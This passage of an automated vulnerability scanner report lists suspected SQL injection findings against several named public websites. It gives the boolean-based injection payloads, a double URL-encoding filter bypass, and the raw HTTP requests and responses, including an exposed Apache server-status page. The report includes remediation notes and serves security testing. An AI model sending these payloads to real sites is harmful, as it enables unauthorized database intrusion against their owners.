tagOptions415.rel = 'Stylesheet';
tagOptions415.type = 'text/css';
tagOptions415.media = 'screen, projection';
heWriteAbsoluteBrowserAwareStyleSheetLink('main_knowledge','http://assets%d.helium.com',tagOptions415) </script>
<script>var tagOptions656 = new Object();
tagOptions656.rel = 'Stylesheet';
tagOptions656.type = 'text/css';
tagOptions656.media = 'print';
heWriteAbsoluteBrowserAwareStyleSheetLink('print_knowledge','http://assets%d.helium.com',tagOptions656) </script>
<script>var tagOptions381 = new Object();
heWriteAbsoluteJavaScriptTag('adcode.js','http://assets%d.helium.com',tagOptions381) </script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8925353227623969");
GS_googleEnableAllServices();
</script>
<script type="text/javascript">
GA_googleUseIframeRendering();
</script>

<script type="text/javascript">
var HELAD_url_part_1 = "server-status?119769932'%20or%201%3d1--%20=1";
var HELAD_url_part_2 = "";
var adparams = new AdSales_pagesetup();
adparams.setPageName("cms_index");
</script>

</head>
<body>


<div id="bigWrapper">


<!-- google_ad_section_start(name=nav, weight=0.0) -->

<div id="topNav" class="noRelated">


   <div id="utilityNav">
<ul class="none">
<li><a href="http://video.helium.com" target="_top">Videos</a> |</li>

<li><a href="http://howto.helium.com" target="_top">How To Guides</a> |</li>
<li><a href="http://www.helium.com/content/helium-community" target="_top">Community</a></li>
</ul>
   
    <span id="loginStatus">
       
   
<a href="http://www.helium.com/users/my_account">My Helium</a> | <a href="http://www.helium.com/registration/signup" target="_top">Join</a> | <a href="http://www.helium.com/login?after_login=my_helium" target="_top">Log in</a>


...[SNIP]...

Request 2

GET /server-status?119769932'%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.helium.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:56:07 GMT
Server: Mongrel 1.1.3
Status: 404
Cache-Control: no-cache, max-age=3600
Content-Type: text/html; charset=utf-8
Content-Length: 14609
Set-Cookie: _helium_session=5edca78971d521c418cef18701baf2ba; path=/
Expires: Sat, 02 Apr 2011 03:56:07 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.helium.com/P3P/PolicyReferences.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Page Built: Sat Apr 02 02:56:07 +0000 2011 -->
<html xmlns="http:
...[SNIP]...
<script>var tagOptions429 = new Object();
tagOptions429.rel = 'Stylesheet';
tagOptions429.type = 'text/css';
tagOptions429.media = 'screen, projection';
heWriteAbsoluteBrowserAwareStyleSheetLink('main_knowledge','http://assets%d.helium.com',tagOptions429) </script>
<script>var tagOptions0 = new Object();
tagOptions0.rel = 'Stylesheet';
tagOptions0.type = 'text/css';
tagOptions0.media = 'print';
heWriteAbsoluteBrowserAwareStyleSheetLink('print_knowledge','http://assets%d.helium.com',tagOptions0) </script>
<script>var tagOptions195 = new Object();
heWriteAbsoluteJavaScriptTag('adcode.js','http://assets%d.helium.com',tagOptions195) </script>

<script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
<script type="text/javascript">
GS_googleAddAdSenseService("ca-pub-8925353227623969");
GS_googleEnableAllServices();
</script>
<script type="text/javascript">
GA_googleUseIframeRendering();
</script>

<script type="text/javascript">
var HELAD_url_part_1 = "server-status?119769932'%20or%201%3d2--%20=1";
var HELAD_url_part_2 = "";
var adparams = new AdSales_pagesetup();
adparams.setPageName("cms_index");
</script>

</head>
<body>


<div id="bigWrapper">


<!-- google_ad_section_start(name=nav, weight=0.0) -->

<div id="topNav" class="noRelated">


   <div id="utilityNav">
<ul class="none">
<li><a href="http://video.helium.com" target="_top">Videos</a> |</li>

<li><a href="http://howto.helium.com" target="_top">How To Guides</a> |</li>
<li><a href="http://www.helium.com/content/helium-community" target="_top">Community</a></li>
</ul>
   
    <span id="loginStatus">
       
   
<a href="http://www.helium.com/users/my_account">My Helium</a> | <a href="http://www.helium.com/registration/signup" target="_top">Join</a> | <a href="http://www.helium.com/login?after_login=my_helium" target="_top">Log in</a>

       
...[SNIP]...
1.10. http://www.lyricsdepot.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.lyricsdepot.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 53844502'%20or%201%3d1--%20 and 53844502'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status53844502'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyricsdepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:19:58 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 4212
Connection: close
Content-Type: text/html

<html>
<head>
<title>The Four Freshmen Lyrics</title>
<meta name=description content="The Four Freshmen Lyrics at the Lyrics Depot">
<meta name=keywords content="The Four Freshmen, lyrics, free, song lyrics">
<link rel="stylesheet" type="text/css" href="/site/inc/stylesheet.css">
<script language="javascript" src="/site/inc/scripts40.js"></script>
<script language="javascript"><!--
var artist = 'The Four Freshmen';
--></script>
</head>
<body bgcolor="#2060A0">

<center>
<table width="760" border="0" bgcolor="#004080" cellpadding="10" cellspacing="0">
<tr>
<td class="path">
Lyrics Depot
</td>
<td class="path" align="right">
<script language="javascript"><!--
middlead();
--></script>
</td>
</tr>
<tr>
<td colspan="2" width="760" bgcolor="#909090" align="center">
<script type="text/javascript"><!--
e9 = new Object();
e9.addBlockingCategories="Pop-under,Pop-up";
e9.size = "728x90,468x60";
//--></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/LyricsDepot/ROS/tags.js"></script>
</td>
</tr>
</table>
<table width="760" border="0" bgcolor="#004080" cellpadding="4" cellspacing="0">
<tr>
<td width="410" class="path">
<a href="http://www.lyricsdepot.com">Lyrics</a> &raquo; <b>The Four Freshmen Lyrics</b>
</td>
<form id="searchbox_016291345183668028587:91lghttsabu" action="http://www.lyricsdepot.com/searchresults.php">
<td width="350" class="path">
<span class="nobr">Find Song Lyrics: <input type="hidden" name="cx" value="016291345183668028587:91lghttsabu" /><input name="q" type="text" size="25" /> <input type="submit" name="sa" value="Search" /><input type="hidden" name="cof" value="FORID:11" /></span>
</td>
</form>
<script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_016291345183668028587%3A91lghttsabu"></script>

...[SNIP]...

Request 2

GET /server-status53844502'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.lyricsdepot.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 02:19:59 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
Vary: Accept-Encoding
Content-Length: 5160
Connection: close
Content-Type: text/html

doh<html>
<head>
<title>Lyrics Depot - Lyrics Not Found</title>
<link rel="stylesheet" type="text/css" href="/site/inc/stylesheet.css">
<script language="javascript" src="/site/inc/scripts40.js"></script>
</head>
<body bgcolor="#2060A0">

<center>
<table width="760" border="0" bgcolor="#004080" cellpadding="10" cellspacing="0">
<tr>
<td class="path">
LyricsDepot.com - Music Song Lyrics Archive
</td>
</tr>
<tr>
<td width="760" bgcolor="#909090" align="center">
<script type="text/javascript"><!--
e9 = new Object();
e9.addBlockingCategories="Pop-under,Pop-up";
e9.size = "728x90,468x60";
//--></script>
<script type="text/javascript" src="http://tags.expo9.exponential.com/tags/LyricsDepot/ROS/tags.js"></script>
</td>
</tr>
</table>
<table width="760" border="0" bgcolor="#004080" cellpadding="4" cellspacing="0">
<tr>
<td width="410" class="path">
Your #1 source for song lyrics!
</td>
<form id="searchbox_016291345183668028587:91lghttsabu" action="http://www.lyricsdepot.com/searchresults.php">
<td width="350" class="path">
<span class="nobr">Find Song Lyrics: <input type="hidden" name="cx" value="016291345183668028587:91lghttsabu" /><input name="q" type="text" size="25" /> <input type="submit" name="sa" value="Search" /><input type="hidden" name="cof" value="FORID:11" /></span>
</td>
</form>
<script type="text/javascript" src="http://google.com/coop/cse/brand?form=searchbox_016291345183668028587%3A91lghttsabu"></script>
</tr>
</table>
<table width="760" border="0" bgcolor="#C0C0C0" cellpadding="10" cellspacing="0">
<tr>
<td valign="top" bgcolor="#909090" class="menu" width="140">
<p><b>Link to Us</b><br>
Webmasters! Like this song? <a href="javascript:addLink('Lyrics+Depot','http://www.lyricsdepot.com')">Add a link</a> to our site.
<p><b>Bookmark</b><br>
Like the sit
...[SNIP]...
1.11. http://www.newsweek.com/server-status [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.newsweek.com
Path:   /server-status

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 55974988%20or%201%3d1--%20 and 55974988%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status?155974988%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newsweek.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Age: 0
Cache-Control: max-age=120
Content-Type: text/html; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 02:47:04 GMT
Expires: Sat, 02 Apr 2011 02:49:04 GMT
Server: Apache
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 1753611622
Content-Length: 4028
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for www.newsweek.com</h1>

<dl><dt>Server Version: Apache/2.2.8
...[SNIP]...
<dt>Server Built: Jun 18 2010 11:00:02
</dt></dl><hr /><dl>
<dt>Current Time: Saturday, 02-Apr-2011 02:47:04 UTC</dt>
<dt>Restart Time: Friday, 18-Feb-2011 18:54:38 UTC</dt>
<dt>Parent Server Generation: 6</dt>
<dt>Server uptime: 42 days 7 hours 52 minutes 25 seconds</dt>
<dt>3 requests currently being processed, 72 idle workers</dt>
</dl><pre>______________W______K___.......................................
_________________________.......................................
____________________K____.......................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
</pre>
<p>Scoreboard Key:<br />
"<b><code>_</code></b>" Waiting for Connection,
"<b><code>S</code></b>" Starting up,
"<b><code>R</code></b>" Reading Request,<br />
"<b><code>W</code></b>" Sending Reply,
"<b><code>K</code></b>" Keepalive (read),
"<b><code>D</code></b>" DNS Lookup,<br />
"<b><code>C</code></b>" Closing connection,
"<b><code>L</code></b>" Logging,
"<b><code>G</code></b>" Gracefully finishing,<br />
"<b><code>I</code></b>" Idle cleanup of worker,
"<b><code>.</code></b>" Open slot with no current process</p>
<p />
PID Key: <br />
<pre>
9234 in state: _ , 9234 in state: _ , 9234 in state: _
923
...[SNIP]...

Request 2

GET /server-status?155974988%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.newsweek.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Age: 0
Cache-Control: max-age=120
Content-Type: text/html; charset=ISO-8859-1
Date: Sat, 02 Apr 2011 02:47:04 GMT
Expires: Sat, 02 Apr 2011 02:49:04 GMT
Server: Apache
Vary: Accept-Encoding
Via: 1.1 varnish
X-Cacheable: YES
X-Varnish: 1753611626
Content-Length: 4078
Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html><head>
<title>Apache Status</title>
</head><body>
<h1>Apache Server Status for www.newsweek.com</h1>

<dl><dt>Server Version: Apache/2.2.8
...[SNIP]...
<dt>Server Built: Mar 9 2010 20:42:14
</dt></dl><hr /><dl>
<dt>Current Time: Saturday, 02-Apr-2011 02:47:04 UTC</dt>
<dt>Restart Time: Friday, 18-Feb-2011 18:54:09 UTC</dt>
<dt>Parent Server Generation: 6</dt>
<dt>Server uptime: 42 days 7 hours 52 minutes 54 seconds</dt>
<dt>4 requests currently being processed, 71 idle workers</dt>
</dl><pre>_______KK__________K_____.......................................
_________________________.......................................
................................................................
___W_____________________.......................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
................................................................
</pre>
<p>Scoreboard Key:<br />
"<b><code>_</code></b>" Waiting for Connection,
"<b><code>S</code></b>" Starting up,
"<b><code>R</code></b>" Reading Request,<br />
"<b><code>W</code></b>" Sending Reply,
"<b><code>K</code></b>" Keepalive (read),
"<b><code>D</code></b>" DNS Lookup,<br />
"<b><code>C</code></b>" Closing connection,
"<b><code>L</code></b>" Logging,
"<b><code>G</code></b>" Gracefully finishing,<br />
"<b><code>I</code></b>" Idle cleanup of worker,
"<b><code>.</code></b>" Open slot with no current process</p>
<p />
PID Key: <br />
<pre>
27905 in state: _ , 27905 in state: _ , 27905 in state: _

...[SNIP]...
1.12. http://www.qwickstep.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.qwickstep.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload %2527 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /server-status%2527 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.qwickstep.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 NOT FOUND
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 00:14:56 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Cookie
Content-Length: 28254

<html>
<head>
   <title>QwickStep Answers Search Engine</title>
   <meta name="keywords" value="">
   <meta name="description" value="QwickStep Answers Search Engine">
   <meta name="cpalead-verification" con
...[SNIP]...
<a href="/search/view-answer/why-postgresql.html" class="top-weight-1">
...[SNIP]...
1.13. http://www.smartertravel.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.smartertravel.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 61858445'%20or%201%3d1--%20 and 61858445'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /server-status61858445'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smartertravel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:21:54 GMT
Server: Apache
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STM=f82e9fa182547509f84a4f1f0c8a14823c1bbf7517bd0e0298a9baacf9d35cd769c0f74c8ddce822a9f3d235f76d2a8384ac7997b4dca7eecf7c290959a769f8; expires=Sun, 01-Apr-2012 02:21:54 GMT; path=/
Set-Cookie: vid=4d9688423d6c39.84045331; path=/; domain=.smartertravel.com
Set-Cookie: uu=7a21d162-badf-46e5-9505-dda26258daf7; path=/; domain=.smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Set-Cookie: entry_time=time; path=/; domain=smartertravel.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 23881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
<img src="http://stats.smartertravel.com/b/ss/sltravelcom/1/H.10--NS/1361859917?g=http%3A%2F%2Fwww.smartertravel.com%2Ferrordocs%2F404.php&amp;r=&amp;s.eVar37=1%7CI4&amp;s.channel=404+Error&amp;s.eVar24=404+Error&amp;s.pageType=errorPage&amp;s.server=app24&amp;s.eVar11=22&amp;s.events=event11%2Cevent12%2Cevent15" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.10. -->
</div>

<div id="outer_wrapper">

<div id="wrapper">
   <p class="hide"><a href="#top">Skip navigation</a></p>
<div id="masthead">
           <a href="http://www.smartertravel.com/">
           <img src="http://i.slimg.com/st/header/2.0/header-bg-left.gif" alt="Cheap Airfare, Vacation Deals, Car Rental, and Discount Travel - SmarterTravel.com" />
       </a>
       <div class='search_wrapper'><div class='search'>
       <form method="get" action="http://www.smartertravel.com/search/" target="_top">
           <input type="text" class="search_text" name="q" value=""/> <input type="image" class="search_submit" src="http://i.slimg.com/st/buttons/pluck/1.2/search.png" alt="Search Button"/>
       </form>
   </div></div>
   <div id="MySmarterTravel">
   <div class="st_profile_image">
       <div class="st_profile_shadow"><img src="http://i.slimg.com/st/avatar-shadow.png" alt="shadow" /></div>
       <div class="st_profile_actual_image"><a href="http://www.smartertravel.com/community/"><img src="http://sitelife.smartertravel.com/ver1.0/Content/images/no-user-image.gif" alt="User's Avatar" /></a></div>
   </div>
   <div class="st_header">My SmarterTravel</div>
   <div class="st_links">
       <a href="/community/login.php" id="login_layer">Log In</a> |
       <a href="/community/register.php" id="signup_layer">Join Now</a>    </div>
</div>
   <!-- <div class="survey_wrapper"><span class="obf href:$|d~$|i~0tvc0tvswfz/qiq@sfuvso>$|d~$|i~0tfswfs.tubuvt72969556(&31ps&312&4e2..&31@IUUQIPTU>$|i~" id="4d96884258ca3" >Join our survey panel</span></div> -->
</div>

<ul id="topnav_tabs">
<li id="st_home_page_tab" class="nav_tab"><a href="/" target="_top" rel="nofollow"><span>home</span></a><ul><li>&n
...[SNIP]...

Request 2

GET /server-status61858445'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.smartertravel.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:21:54 GMT
Server: Apache
P3P: policyref="http://www.bookingbuddy.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMo DEVo PSAo PSDo IVAo IVDo CONo OUR DELa OTRa IND COM NAV"
Set-Cookie: STM=0d3cf84215c4b8a2a44b1d83d5a67dcc648387b449ecbac8670f031dc81b830a817581c669549fdb15b6091f43f06171959e9c6c6f48be1383dd4130c96755c2; expires=Sun, 01-Apr-2012 02:21:54 GMT; path=/
Set-Cookie: vid=4d968842733f73.09988363; path=/; domain=.smartertravel.com
Set-Cookie: uu=20839c2b-dfe9-46c5-bd8a-75604c445a31; path=/; domain=.smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=smartertravel.com
Set-Cookie: STMUL=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: at=deleted; expires=Fri, 02-Apr-2010 02:21:53 GMT; path=/; domain=.smartertravel.com
Set-Cookie: o_prvchan=404+Error; path=/
Set-Cookie: entry_time=time; path=/; domain=smartertravel.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 23871

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="h
...[SNIP]...
<img src="http://stats.smartertravel.com/b/ss/sltravelcom/1/H.10--NS/268758348?g=http%3A%2F%2Fwww.smartertravel.com%2Ferrordocs%2F404.php&amp;r=&amp;s.eVar37=1%7CI4&amp;s.channel=404+Error&amp;s.eVar24=404+Error&amp;s.pageType=errorPage&amp;s.server=app24&amp;s.eVar11=22&amp;s.events=event11%2Cevent12%2Cevent15" height="1" width="1" border="0" alt="" /></a></noscript><!--/DO NOT REMOVE/-->
<!-- End SiteCatalyst code version: H.10. -->
</div>

<div id="outer_wrapper">

<div id="wrapper">
   <p class="hide"><a href="#top">Skip navigation</a></p>
<div id="masthead">
           <a href="http://www.smartertravel.com/">
           <img src="http://i.slimg.com/st/header/2.0/header-bg-left.gif" alt="Cheap Airfare, Vacation Deals, Car Rental, and Discount Travel - SmarterTravel.com" />
       </a>
       <div class='search_wrapper'><div class='search'>
       <form method="get" action="http://www.smartertravel.com/search/" target="_top">
           <input type="text" class="search_text" name="q" value=""/> <input type="image" class="search_submit" src="http://i.slimg.com/st/buttons/pluck/1.2/search.png" alt="Search Button"/>
       </form>
   </div></div>
   <div id="MySmarterTravel">
   <div class="st_profile_image">
       <div class="st_profile_shadow"><img src="http://i.slimg.com/st/avatar-shadow.png" alt="shadow" /></div>
       <div class="st_profile_actual_image"><a href="http://www.smartertravel.com/community/"><img src="http://sitelife.smartertravel.com/ver1.0/Content/images/no-user-image.gif" alt="User's Avatar" /></a></div>
   </div>
   <div class="st_header">My SmarterTravel</div>
   <div class="st_links">
       <a href="/community/login.php" id="login_layer">Log In</a> |
       <a href="/community/register.php" id="signup_layer">Join Now</a>    </div>
</div>
   <!-- <div class="survey_wrapper"><span class="obf href:$|d~$|i~0tvc0tvswfz/qiq@sfuvso>$|d~$|i~0tfswfs.tubuvt72969556(&31ps&312&4e3..&31@IUUQIPTU>$|i~" id="4d96884290749" >Join our survey panel</span></div> -->
</div>

<ul id="topnav_tabs">
<li id="st_home_page_tab" class="nav_tab"><a href="/" target="_top" rel="nofollow"><span>home</span></a><ul><li>&nb
...[SNIP]...
1.14. http://www.tech-recipes.com/server-info [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tech-recipes.com
Path:   /server-info

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 18776569'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /server-info18776569'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-recipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 01:57:24 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://www.tech-recipes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 01:57:24 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http://
...[SNIP]...
<a href="http://www.tech-recipes.com/category/database/" title="mysql, postgresql, oracle, tables, database,">
...[SNIP]...
1.15. http://www.tech-recipes.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.tech-recipes.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload 29838048'%20or%201%3d1--%20 was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /server-status29838048'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.tech-recipes.com
Accept: */*
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 02:32:27 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: W3 Total Cache/0.8.5.2
X-Pingback: http://www.tech-recipes.com/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Sat, 02 Apr 2011 02:32:28 GMT
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 14374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head profile="http://
...[SNIP]...
<a href="http://www.tech-recipes.com/category/database/" title="mysql, postgresql, oracle, tables, database,">
...[SNIP]...
1.16. http://www.travelscream.com/server-status [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.travelscream.com
Path:   /server-status

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /server-status' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelscream.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1 (redirected)

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:47:02 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n22 ( iad-agg-n12), ms iad-agg-n12 ( origin)
ETag: "6a1aeb994e58cb1:0"
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 02:47:02 GMT
Age: 0
Content-Type: text/html
Last-Modified: Sun, 19 Sep 2010 23:01:32 GMT
Connection: keep-alive
Content-Length: 7796

...<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
   <head id="_ctl0_Head1"><title>
Travelscream - Error
</title><
...[SNIP]...

Request 2

GET /server-status'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.travelscream.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 02:47:02 GMT
Server: PWS/1.7.1.5
X-Px: ms iad-agg-n22 ( iad-agg-n28), ms iad-agg-n28 ( origin>CONN)
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Cache-Control: max-age=1200
Expires: Sat, 02 Apr 2011 03:07:02 GMT
Age: 1
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Content-Length: 241770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
1.17. http://www.usf.edu/server-info [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.usf.edu
Path:   /server-info

Issue detail

